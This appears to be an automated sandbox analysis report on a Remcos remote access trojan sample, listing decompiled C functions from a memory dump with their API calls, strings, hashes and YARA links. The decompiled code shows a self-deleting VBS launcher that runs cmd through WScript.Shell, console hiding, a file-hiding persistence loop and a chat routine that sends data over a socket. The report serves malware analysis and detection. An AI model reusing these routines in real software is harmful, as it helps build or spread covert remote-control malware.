                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0040B4AC, Relevance: 17.6, APIs: 3, Strings: 7, Instructions: 148COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 100%
                                                                                                			E0040B4AC(void* __ebx, void* __eflags) {
				char _v28;
				char _v52;
				char _v76;
				char _v100;
				char _v124;
				char _v148;
				char _v172;
				char _v196;
				short _v716;
				void* __edi;
				void* __ebp;
				void* _t36;
				void* _t37;
				void* _t40;
				void* _t54;
				void* _t67;
				void* _t68;
				void* _t79;

				_t79 = __ebx;
				E00410199();
				_t36 = E0040247B();
				_t37 = E00401F87(0x46e5f0);
				_t40 = E00410A5F(E00401F87(0x46e5a8), "exepath",  &_v716, 0x208, _t37, _t36);
				_t140 = _t40;
				if(_t40 == 0) {
					GetModuleFileNameW(0,  &_v716, 0x208);
				}
				E00403098(_t79,  &_v124, E00417CCA( &_v52, E00417A83( &_v76)), 0, _t140, L".vbs");
				E00401EE2();
				E00401FB9();
				E0040440A(_t79,  &_v100, E00403098(_t79,  &_v76, E00404260(_t79,  &_v52, E00437AEF(_t79,  &_v76, _t140, L"Temp")), 0, _t140, "\\"), _t140,  &_v124);
				E00401EE2();
				E00401EE2();
				E00401F5F(_t79,  &_v28);
				_t54 = E00404260(_t79,  &_v196, L"\"\"\", 0");
				E00403303(E00403098(_t79,  &_v76, E00403022( &_v52, E00403098(_t79,  &_v148, E00404260(_t79,  &_v172, L"CreateObject(\"WScript.Shell\").Run \"cmd /c \"\""), 0, _t140,  &_v716), _t54), 0, _t140, "\n"));
				E00401EE2();
				E00401EE2();
				E00401EE2();
				E00401EE2();
				E00401EE2();
				E0040778C(_t79,  &_v28, 0, L"CreateObject(\"Scripting.FileSystemObject\").DeleteFile(Wscript.ScriptFullName)");
				_t67 = E00401EDD( &_v100);
				_t68 = E0040247B();
				if(E00418337(E00401EDD( &_v28), _t68 + _t68, _t67, 0) != 0 && ShellExecuteW(0, L"open", E00401EDD( &_v100), 0x46079c, 0x46079c, 0) > 0x20) {
					ExitProcess(0);
				}
				E00401EE2();
				E00401EE2();
				return E00401EE2();
			}





















                                                                                                0x0040b4ac
                                                                                                0x0040b4b7
                                                                                                0x0040b4c3
                                                                                                0x0040b4cb
                                                                                                0x0040b4ef
                                                                                                0x0040b4f9
                                                                                                0x0040b4fb
                                                                                                0x0040b506
                                                                                                0x0040b506
                                                                                                0x0040b528
                                                                                                0x0040b531
                                                                                                0x0040b539
                                                                                                0x0040b56b
                                                                                                0x0040b574
                                                                                                0x0040b57c
                                                                                                0x0040b584
                                                                                                0x0040b599
                                                                                                0x0040b5de
                                                                                                0x0040b5e6
                                                                                                0x0040b5ee
                                                                                                0x0040b5f9
                                                                                                0x0040b604
                                                                                                0x0040b60f
                                                                                                0x0040b61c
                                                                                                0x0040b625
                                                                                                0x0040b62e
                                                                                                0x0040b64c
                                                                                                0x0040b671
                                                                                                0x0040b671
                                                                                                0x0040b67a
                                                                                                0x0040b682
                                                                                                0x0040b694

                                                                                                APIs
                                                                                                  • Part of subcall function 00410199: TerminateProcess.KERNEL32(00000000,?,0040ADB9), ref: 004101A9
                                                                                                  • Part of subcall function 00410199: WaitForSingleObject.KERNEL32(000000FF,?,0040ADB9), ref: 004101BC
                                                                                                  • Part of subcall function 00410A5F: RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,00000000,origmsc), ref: 00410A7B
                                                                                                  • Part of subcall function 00410A5F: RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,000003E8,?), ref: 00410A94
                                                                                                  • Part of subcall function 00410A5F: RegCloseKey.ADVAPI32(00000000), ref: 00410A9F
                                                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040B506
                                                                                                • ShellExecuteW.SHELL32(00000000,open,00000000,0046079C,0046079C,00000000), ref: 0040B665
                                                                                                • ExitProcess.KERNEL32 ref: 0040B671
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp Download File
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                                                                                                • String ID: """, 0$.vbs$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
                                                                                                • API String ID: 1913171305-2411266221
                                                                                                • Opcode ID: 16eb3a1aee9e744480a25e704904c60fb2ee977b531af39979622423ab843efb
                                                                                                • Instruction ID: 50d1eacbe9d4bae87c6deddb7dde53d9086f1fae01dd1ae82fe3b0704b6d40e9
                                                                                                • Opcode Fuzzy Hash: 16eb3a1aee9e744480a25e704904c60fb2ee977b531af39979622423ab843efb
                                                                                                • Instruction Fuzzy Hash: DB414E719011185ACB04FBA2DC96DEE7778AF50708F10017FF506B21E2EE385E8ACA9D
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 004199B8, Relevance: 17.6, APIs: 3, Strings: 7, Instructions: 89memoryCOMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 59%
                                                                                                			E004199B8(void* __ebx, void* __ecx, void* __edx) {
				char _v204;
				void* __edi;
				struct HWND__* _t17;
				void _t22;
				intOrPtr _t24;
				intOrPtr _t25;
				void _t26;
				void _t28;
				void* _t30;
				void* _t34;
				signed int _t37;
				void* _t45;
				void* _t47;
				void* _t51;
				void* _t53;
				void* _t55;
				void* _t59;

				_t36 = __ecx;
				_t34 = __ecx;
				AllocConsole();
				_t17 =  *0x46ebe0(__ebx);
				 *0x46e0ac = _t17;
				if(_t34 == 0) {
					ShowWindow(_t17, 0);
				}
				_push(_t45);
				E0043CF7D(_t36, "CONOUT$", "a", E0043855F(1));
				E00432D80(_t45,  &_v204, 0, 0xc8);
				_t47 =  &_v204 - 1;
				do {
					_t22 =  *(_t47 + 1);
					_t47 = _t47 + 1;
				} while (_t22 != 0);
				_t37 = 7;
				memcpy(_t47, "--------------------------\n", _t37 << 2);
				_t51 =  &_v204 - 1;
				do {
					_t24 =  *((intOrPtr*)(_t51 + 1));
					_t51 = _t51 + 1;
				} while (_t24 != 0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t53 =  &_v204 - 1;
				do {
					_t25 =  *((intOrPtr*)(_t53 + 1));
					_t53 = _t53 + 1;
				} while (_t25 != 0);
				asm("movsd");
				asm("movsd");
				asm("movsw");
				_t55 =  &_v204 - 1;
				do {
					_t26 =  *(_t55 + 1);
					_t55 = _t55 + 1;
				} while (_t26 != 0);
				_push(6);
				memcpy(_t55, "\n * BreakingSecurity.net\n", 0 << 2);
				asm("movsw");
				_t59 =  &_v204 - 1;
				do {
					_t28 =  *(_t59 + 1);
					_t59 = _t59 + 1;
					_t85 = _t28;
				} while (_t28 != 0);
				_t30 = memcpy(_t59, "--------------------------\n\n", 0 << 2);
				asm("movsb");
				return E00417604(_t85, _t30, 7);
			}




















                                                                                                0x004199b8
                                                                                                0x004199c2
                                                                                                0x004199c4
                                                                                                0x004199ca
                                                                                                0x004199d2
                                                                                                0x004199d8
                                                                                                0x004199dd
                                                                                                0x004199dd
                                                                                                0x004199e4
                                                                                                0x004199f7
                                                                                                0x00419a0a
                                                                                                0x00419a18
                                                                                                0x00419a19
                                                                                                0x00419a19
                                                                                                0x00419a1c
                                                                                                0x00419a1d
                                                                                                0x00419a23
                                                                                                0x00419a29
                                                                                                0x00419a31
                                                                                                0x00419a32
                                                                                                0x00419a32
                                                                                                0x00419a35
                                                                                                0x00419a36
                                                                                                0x00419a3f
                                                                                                0x00419a40
                                                                                                0x00419a41
                                                                                                0x00419a48
                                                                                                0x00419a49
                                                                                                0x00419a49
                                                                                                0x00419a4c
                                                                                                0x00419a4d
                                                                                                0x00419a56
                                                                                                0x00419a57
                                                                                                0x00419a58
                                                                                                0x00419a60
                                                                                                0x00419a61
                                                                                                0x00419a61
                                                                                                0x00419a64
                                                                                                0x00419a65
                                                                                                0x00419a69
                                                                                                0x00419a71
                                                                                                0x00419a73
                                                                                                0x00419a7b
                                                                                                0x00419a7c
                                                                                                0x00419a7c
                                                                                                0x00419a7f
                                                                                                0x00419a80
                                                                                                0x00419a80
                                                                                                0x00419a92
                                                                                                0x00419a95
                                                                                                0x00419aa1

                                                                                                APIs
                                                                                                • AllocConsole.KERNEL32(00000001), ref: 004199C4
                                                                                                • GetConsoleWindow.KERNEL32 ref: 004199CA
                                                                                                • ShowWindow.USER32(00000000,00000000), ref: 004199DD
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp Download File
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ConsoleWindow$AllocShow
                                                                                                • String ID: * BreakingSecurity.net$ * Remcos v$--------------------------$--------------------------$3.3.2 Pro$CONOUT$$hpg
                                                                                                • API String ID: 3461962499-3378204264
                                                                                                • Opcode ID: f6657928ed06dba2a905d0438f486c26dfb192fb12f351024f99a457849e62c5
                                                                                                • Instruction ID: 376f907b1e217a26e7f1eac8cc5f7dbbc1ba93a394bfc088cef5e685ba49c60e
                                                                                                • Opcode Fuzzy Hash: f6657928ed06dba2a905d0438f486c26dfb192fb12f351024f99a457849e62c5
                                                                                                • Instruction Fuzzy Hash: 5F212B3680864156DF109F15AC01FD6BB6AAF92744F044293E84C7F141DBA76DDA87AC
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 004362EA, Relevance: 16.6, APIs: 11, Instructions: 116COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 100%
                                                                                                			E004362EA(void* __edx, void* __eflags, char* _a4, int _a8, char* _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				int _v8;
				int _v12;
				char _v16;
				intOrPtr _v24;
				char _v28;
				void* __ebx;
				char* _t31;
				int _t35;
				int _t43;
				void* _t51;
				int _t52;
				int _t54;
				void* _t56;
				void* _t63;
				short* _t64;
				short* _t67;

				_t62 = __edx;
				E00436267(_t51,  &_v28, __edx, _a24);
				_t52 = 0;
				_t54 =  *(_v24 + 0x14);
				_t31 = _a4;
				_v8 = _t54;
				if(_t31 == 0) {
					L4:
					 *((intOrPtr*)(E00438932())) = 0x16;
					E00437709();
					L18:
					if(_v16 != 0) {
						 *(_v28 + 0x350) =  *(_v28 + 0x350) & 0xfffffffd;
					}
					return _t52;
				}
				_t66 = _a8;
				if(_a8 == 0) {
					goto L4;
				}
				 *_t31 = 0;
				if(_a12 == 0 || _a16 == 0) {
					goto L4;
				} else {
					_t35 = MultiByteToWideChar(_t54, 0, _a12, 0xffffffff, 0, 0);
					_v12 = _t35;
					if(_t35 != 0) {
						_t64 = E00440C6C(_t54, _t35 + _t35);
						_t56 = _t63;
						if(_t64 != 0) {
							if(MultiByteToWideChar(_v8, 0, _a12, 0xffffffff, _t64, _v12) != 0) {
								_t67 = E00440C6C(_t56, _t66 + _t66);
								if(_t67 != 0) {
									_t43 = E00442733(0, _t62, _t67, _a8, _t64, _a16, _a20, _a24);
									_v12 = _t43;
									if(_t43 != 0) {
										if(WideCharToMultiByte(_v8, 0, _t67, 0xffffffff, _a4, _a8, 0, 0) != 0) {
											_t52 = _v12;
										} else {
											E004388FC(GetLastError());
										}
									}
								}
								E004414D5(_t67);
							} else {
								E004388FC(GetLastError());
							}
						}
						E004414D5(_t64);
					} else {
						E004388FC(GetLastError());
					}
					goto L18;
				}
			}



















                                                                                                0x004362ea
                                                                                                0x004362fa
                                                                                                0x00436302
                                                                                                0x00436304
                                                                                                0x00436307
                                                                                                0x0043630a
                                                                                                0x0043630f
                                                                                                0x00436324
                                                                                                0x00436329
                                                                                                0x0043632f
                                                                                                0x00436401
                                                                                                0x00436405
                                                                                                0x0043640a
                                                                                                0x0043640a
                                                                                                0x00436418
                                                                                                0x00436418
                                                                                                0x00436311
                                                                                                0x00436316
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00436318
                                                                                                0x0043631d
                                                                                                0x00000000
                                                                                                0x00436339
                                                                                                0x00436342
                                                                                                0x00436348
                                                                                                0x0043634d
                                                                                                0x0043636a
                                                                                                0x0043636c
                                                                                                0x0043636f
                                                                                                0x0043638a
                                                                                                0x004363a3
                                                                                                0x004363a8
                                                                                                0x004363b8
                                                                                                0x004363c0
                                                                                                0x004363c5
                                                                                                0x004363de
                                                                                                0x004363ef
                                                                                                0x004363e0
                                                                                                0x004363e7
                                                                                                0x004363ec
                                                                                                0x004363de
                                                                                                0x004363c5
                                                                                                0x004363f3
                                                                                                0x0043638c
                                                                                                0x00436393
                                                                                                0x00436393
                                                                                                0x004363f8
                                                                                                0x004363fa
                                                                                                0x0043634f
                                                                                                0x00436356
                                                                                                0x0043635b
                                                                                                0x00000000
                                                                                                0x0043634d

                                                                                                APIs
                                                                                                • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D2B,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00436342
                                                                                                • GetLastError.KERNEL32(?,?,00401D2B,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043634F
                                                                                                • __dosmaperr.LIBCMT ref: 00436356
                                                                                                • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D2B,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00436382
                                                                                                • GetLastError.KERNEL32(?,?,?,00401D2B,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043638C
                                                                                                • __dosmaperr.LIBCMT ref: 00436393
                                                                                                • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401D2B,?), ref: 004363D6
                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,00401D2B,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004363E0
                                                                                                • __dosmaperr.LIBCMT ref: 004363E7
                                                                                                • _free.LIBCMT ref: 004363F3
                                                                                                • _free.LIBCMT ref: 004363FA
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp Download File
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                                                                                                • String ID:
                                                                                                • API String ID: 2441525078-0
                                                                                                • Opcode ID: 60cc57f5f55a393d52f28039bedbdabb895f99d02aca867e29ce67f9be203048
                                                                                                • Instruction ID: 2c5cfa2bbbf2b121d32445315a33a4036265803538bdfa5b44ed81074408bed6
                                                                                                • Opcode Fuzzy Hash: 60cc57f5f55a393d52f28039bedbdabb895f99d02aca867e29ce67f9be203048
                                                                                                • Instruction Fuzzy Hash: 9531C07280021ABFDF116FA5DC448AF7B78EF08368F11816EF8105A2A1DB38CD51CB69
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00408CA7, Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 168sleepCOMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 98%
                                                                                                			E00408CA7(void* __ecx, char* __edx) {
				char _v1028;
				char _v1040;
				char _v1064;
				char _v1076;
				void* _v1080;
				void* _v1088;
				void* _v1092;
				char _v1100;
				char _v1124;
				void* _v1132;
				char _v1136;
				void* _v1152;
				void* __ebx;
				void* __esi;
				void* __ebp;
				signed char _t34;
				char* _t36;
				void* _t38;
				int _t42;
				void* _t49;
				void* _t53;
				void* _t65;
				int _t66;
				void* _t68;
				void* _t74;
				void* _t75;
				void* _t76;
				void* _t83;
				signed int _t141;
				signed int _t142;
				void* _t143;
				void* _t144;
				signed int _t145;

				_t131 = __edx;
				_t142 = _t141 & 0xfffffff8;
				_t145 = _t142;
				_t143 = _t142 - 0x464;
				_t83 = __ecx;
				_t136 = __ecx + 4;
				do {
					Sleep(0x1388);
					E00408BF6(_t83, _t131);
					_t131 = 0x46079c;
					if(E00407647(_t145) != 0) {
						if(E00409DEA() == 0) {
							CreateDirectoryW(E00401EDD(0x46e428), 0);
						}
						_t133 = _t83 + 0x60;
						_t34 = GetFileAttributesW(E00401EDD(_t83 + 0x60));
						_t148 = _t34 & 0x00000002;
						if((_t34 & 0x00000002) != 0) {
							SetFileAttributesW(E00401EDD(_t133), 0x80);
						}
						_t36 = E00401F87(E00401E3B(0x46e3a4, _t131, _t148, 0x12));
						_t149 =  *_t36;
						if( *_t36 != 0) {
							E004020C7(_t83,  &_v1124);
							_t38 = E0040247B();
							E00405C28( &_v1028, E00401F87(0x46e5f0), _t38);
							_t42 = PathFileExistsW(E00401EDD(_t133));
							__eflags = _t42;
							if(_t42 != 0) {
								E004020C7(_t83,  &_v1100);
								_t65 = E00401EDD(_t133);
								_t131 =  &_v1100;
								_t66 = E004183CC(_t65,  &_v1100);
								__eflags = _t66;
								if(_t66 != 0) {
									_t68 = E0040247B();
									E00401FC3( &_v1136,  &_v1100, _t136, E00405D50(_t83,  &_v1028,  &_v1100,  &_v1076, E00401F87( &_v1100), _t68));
									E00401FB9();
								}
								E00401FB9();
							}
							__eflags = E0040247B() + _t43;
							E00403428(E0040209D(_t83,  &_v1076, _t131, __eflags, E00401EDD(_t136), E0040247B() + _t43));
							E00401FB9();
							_t49 = E0040247B();
							E00405D50(_t83,  &_v1040, _t131,  &_v1064, E00401F87( &_v1136), _t49);
							_t53 = E00401EDD(_t133);
							_t144 = _t143 - 0x18;
							E004020DE(_t83, _t144, _t131, __eflags,  &_v1076);
							E0041843E(_t53);
							_t143 = _t144 + 0x18;
							E00401FB9();
							E00401FB9();
						} else {
							_t74 = E00401EDD(_t133);
							_t75 = E0040247B();
							_t76 = E00401EDD(_t83 + 4);
							_t131 = _t75 + _t75;
							E00418337(_t76, _t75 + _t75, _t74, 1);
						}
						_t136 = _t83 + 4;
						E00409DFE(_t83, _t83 + 4, 0x46079c);
						if( *((char*)(E00401F87(E00401E3B(0x46e3a4, _t131, _t149, 0x13)))) != 0) {
							SetFileAttributesW(E00401EDD(_t133), 6);
						}
					}
				} while ( *((char*)(_t83 + 0x49)) != 0);
				return 0;
			}




































                                                                                                0x00408ca7
                                                                                                0x00408caa
                                                                                                0x00408caa
                                                                                                0x00408cad
                                                                                                0x00408cb4
                                                                                                0x00408cb8
                                                                                                0x00408cbb
                                                                                                0x00408cc0
                                                                                                0x00408cc8
                                                                                                0x00408ccd
                                                                                                0x00408cdb
                                                                                                0x00408ced
                                                                                                0x00408cfc
                                                                                                0x00408cfc
                                                                                                0x00408d02
                                                                                                0x00408d0d
                                                                                                0x00408d13
                                                                                                0x00408d15
                                                                                                0x00408d24
                                                                                                0x00408d24
                                                                                                0x00408d38
                                                                                                0x00408d3d
                                                                                                0x00408d40
                                                                                                0x00408d73
                                                                                                0x00408d7d
                                                                                                0x00408d92
                                                                                                0x00408d9f
                                                                                                0x00408da5
                                                                                                0x00408da7
                                                                                                0x00408dad
                                                                                                0x00408db4
                                                                                                0x00408db9
                                                                                                0x00408dbf
                                                                                                0x00408dc4
                                                                                                0x00408dc6
                                                                                                0x00408dcc
                                                                                                0x00408def
                                                                                                0x00408df8
                                                                                                0x00408df8
                                                                                                0x00408e01
                                                                                                0x00408e01
                                                                                                0x00408e0d
                                                                                                0x00408e26
                                                                                                0x00408e2f
                                                                                                0x00408e38
                                                                                                0x00408e51
                                                                                                0x00408e58
                                                                                                0x00408e5d
                                                                                                0x00408e69
                                                                                                0x00408e70
                                                                                                0x00408e75
                                                                                                0x00408e7c
                                                                                                0x00408e85
                                                                                                0x00408d42
                                                                                                0x00408d46
                                                                                                0x00408d4e
                                                                                                0x00408d5a
                                                                                                0x00408d5f
                                                                                                0x00408d63
                                                                                                0x00408d69
                                                                                                0x00408e8a
                                                                                                0x00408e94
                                                                                                0x00408eaf
                                                                                                0x00408ebb
                                                                                                0x00408ebb
                                                                                                0x00408eaf
                                                                                                0x00408ec1
                                                                                                0x00408ed3

                                                                                                APIs
                                                                                                • Sleep.KERNEL32(00001388), ref: 00408CC0
                                                                                                  • Part of subcall function 00408BF6: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00408CCD), ref: 00408C2C
                                                                                                  • Part of subcall function 00408BF6: GetFileSize.KERNEL32(00000000,00000000,?,?,?,00408CCD), ref: 00408C3B
                                                                                                  • Part of subcall function 00408BF6: Sleep.KERNEL32(00002710,?,?,?,00408CCD), ref: 00408C68
                                                                                                  • Part of subcall function 00408BF6: CloseHandle.KERNEL32(00000000,?,?,?,00408CCD), ref: 00408C6F
                                                                                                • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00408CFC
                                                                                                • GetFileAttributesW.KERNEL32(00000000), ref: 00408D0D
                                                                                                • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 00408D24
                                                                                                • PathFileExistsW.SHLWAPI(00000000,00000012), ref: 00408D9F
                                                                                                  • Part of subcall function 004183CC: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,00000000,00000000,?,00404211,004604D4), ref: 004183E9
                                                                                                • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,0046079C), ref: 00408EBB
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp Download File
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                                                                                                • String ID: (F$(F$hpg
                                                                                                • API String ID: 3795512280-2326968899
                                                                                                • Opcode ID: aee7ea58b02299a83eb969c0d8e9f43ae53927dc5c01a3b69301c737bed604f8
                                                                                                • Instruction ID: f39d74aea4cda4c837f7a9e75c11e0b175b8514aeed9f647f35e0db018923d00
                                                                                                • Opcode Fuzzy Hash: aee7ea58b02299a83eb969c0d8e9f43ae53927dc5c01a3b69301c737bed604f8
                                                                                                • Instruction Fuzzy Hash: EC517F7160420057CB15BB72C956AAF7799AF90308F04093FF942BB2E2EF7C9D45869E
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 004055A6, Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 155windowmemoryCOMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 76%
                                                                                                			E004055A6(char* __edx, void* __eflags, intOrPtr _a4) {
				struct tagMSG _v52;
				void* _v56;
				char _v60;
				char _v76;
				char _v80;
				char _v84;
				char _v104;
				char _v108;
				void* _v112;
				char _v116;
				char _v120;
				char _v140;
				void* _v176;
				void* __ebx;
				void* __ebp;
				intOrPtr* _t28;
				char* _t36;
				intOrPtr _t45;
				intOrPtr _t46;
				void* _t57;
				intOrPtr _t69;
				void* _t111;
				void* _t113;
				void* _t115;
				signed int _t117;
				void* _t120;
				void* _t121;
				void* _t122;
				void* _t123;

				_t125 = __eflags;
				_t101 = __edx;
				_t69 = _a4;
				E004020DE(_t69,  &_v104, __edx, __eflags, _t69 + 0xc);
				SetEvent( *(_t69 + 0x24));
				_t28 = E00401F87( &_v108);
				E00404287( &_v108,  &_v60, 4, 0xffffffff);
				_t120 = (_t117 & 0xfffffff8) - 0x5c;
				E004020DE(_t69, _t120, _t101, _t125, 0x46e250);
				_t121 = _t120 - 0x18;
				E004020DE(_t69, _t121, _t101, _t125,  &_v76);
				E00417E68( &_v140, _t101);
				_t122 = _t121 + 0x30;
				_t111 =  *_t28 - 0x3a;
				if(_t111 == 0) {
					E00401E3B( &_v116, _t101, __eflags, 0);
					_t36 = E0040247B();
					E00401F87(E00401E3B( &_v120, _t101, __eflags, 0));
					_t101 = _t36;
					_t113 = E0040F6D9();
					__eflags = _t113;
					if(_t113 == 0) {
						L7:
						E00401E66( &_v116, _t101);
						E00401FB9();
						E00401FB9();
						__eflags = 0;
						return 0;
					}
					 *0x46dae0 = E0040F96F(_t113, "DisplayMessage");
					_t45 = E0040F96F(_t113, "GetMessage");
					_t104 = "CloseChat";
					 *0x46dad8 = _t45;
					_t46 = E0040F96F(_t113, "CloseChat");
					_t123 = _t122 - 0x18;
					 *0x46dadc = _t46;
					 *0x46dad5 = 1;
					E004020DE(_t69, _t123, "CloseChat", __eflags, 0x46e2e8);
					_push(0x74);
					E00404BB7(_t69, _t69, _t104, __eflags);
					L10:
					_t115 = HeapCreate(0, 0, 0);
					__eflags =  *0x46dad8(_t115,  &_v140);
					if(__eflags != 0) {
						_t123 = _t123 - 0x18;
						E0040209D(_t69, _t123, _t104, __eflags, _v140, _t51);
						_push(0x3b);
						E00404BB7(_t69, _t69, _t104, __eflags);
						HeapFree(_t115, 0, _v176);
					}
					goto L10;
				}
				_t127 = _t111 != 1;
				if(_t111 != 1) {
					goto L7;
				}
				_t57 =  *0x46dae0(E00401F87(E00401E3B( &_v116, _t101, _t127, 0)));
				_t128 = _t57;
				if(_t57 == 0) {
					goto L7;
				}
				E00404260(_t69,  &_v80, 0x460730);
				_t101 =  &_v84;
				E00417D8C(_t69, _t122 - 0x18,  &_v84);
				_push(0x3b);
				E00404BB7(_t69, _t69,  &_v84, _t128);
				E00401EE2();
				L4:
				while(GetMessageA( &_v52, 0, 0, 0) > 0) {
					TranslateMessage( &_v52);
					DispatchMessageA( &_v52);
				}
				if(__eflags < 0) {
					goto L4;
				}
				goto L7;
			}
































                                                                                                0x004055a6
                                                                                                0x004055a6
                                                                                                0x004055b4
                                                                                                0x004055bd
                                                                                                0x004055c5
                                                                                                0x004055cf
                                                                                                0x004055e3
                                                                                                0x004055e8
                                                                                                0x004055f2
                                                                                                0x004055f7
                                                                                                0x00405601
                                                                                                0x0040560a
                                                                                                0x0040560f
                                                                                                0x00405612
                                                                                                0x00405615
                                                                                                0x004056c4
                                                                                                0x004056cb
                                                                                                0x004056de
                                                                                                0x004056e3
                                                                                                0x004056ec
                                                                                                0x004056ee
                                                                                                0x004056f0
                                                                                                0x00405699
                                                                                                0x0040569d
                                                                                                0x004056a6
                                                                                                0x004056af
                                                                                                0x004056b6
                                                                                                0x004056bc
                                                                                                0x004056bc
                                                                                                0x00405703
                                                                                                0x0040570a
                                                                                                0x0040570f
                                                                                                0x00405714
                                                                                                0x0040571b
                                                                                                0x00405720
                                                                                                0x00405723
                                                                                                0x0040572a
                                                                                                0x00405736
                                                                                                0x0040573b
                                                                                                0x0040573f
                                                                                                0x00405744
                                                                                                0x0040574d
                                                                                                0x0040575d
                                                                                                0x0040575f
                                                                                                0x00405761
                                                                                                0x0040576b
                                                                                                0x00405770
                                                                                                0x00405774
                                                                                                0x0040577f
                                                                                                0x0040577f
                                                                                                0x00000000
                                                                                                0x0040575f
                                                                                                0x0040561b
                                                                                                0x0040561e
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00405634
                                                                                                0x0040563b
                                                                                                0x0040563d
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00405648
                                                                                                0x00405650
                                                                                                0x00405656
                                                                                                0x0040565b
                                                                                                0x0040565f
                                                                                                0x00405668
                                                                                                0x00000000
                                                                                                0x0040566d
                                                                                                0x00405684
                                                                                                0x0040568f
                                                                                                0x0040568f
                                                                                                0x00405697
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000

                                                                                                APIs
                                                                                                • SetEvent.KERNEL32(?,?), ref: 004055C5
                                                                                                • GetMessageA.USER32 ref: 00405675
                                                                                                • TranslateMessage.USER32(?), ref: 00405684
                                                                                                • DispatchMessageA.USER32 ref: 0040568F
                                                                                                • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,0046E2E8), ref: 00405747
                                                                                                • HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 0040577F
                                                                                                  • Part of subcall function 00404BB7: send.WS2_32(?,00000000,00000000,00000000), ref: 00404C2B
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp Download File
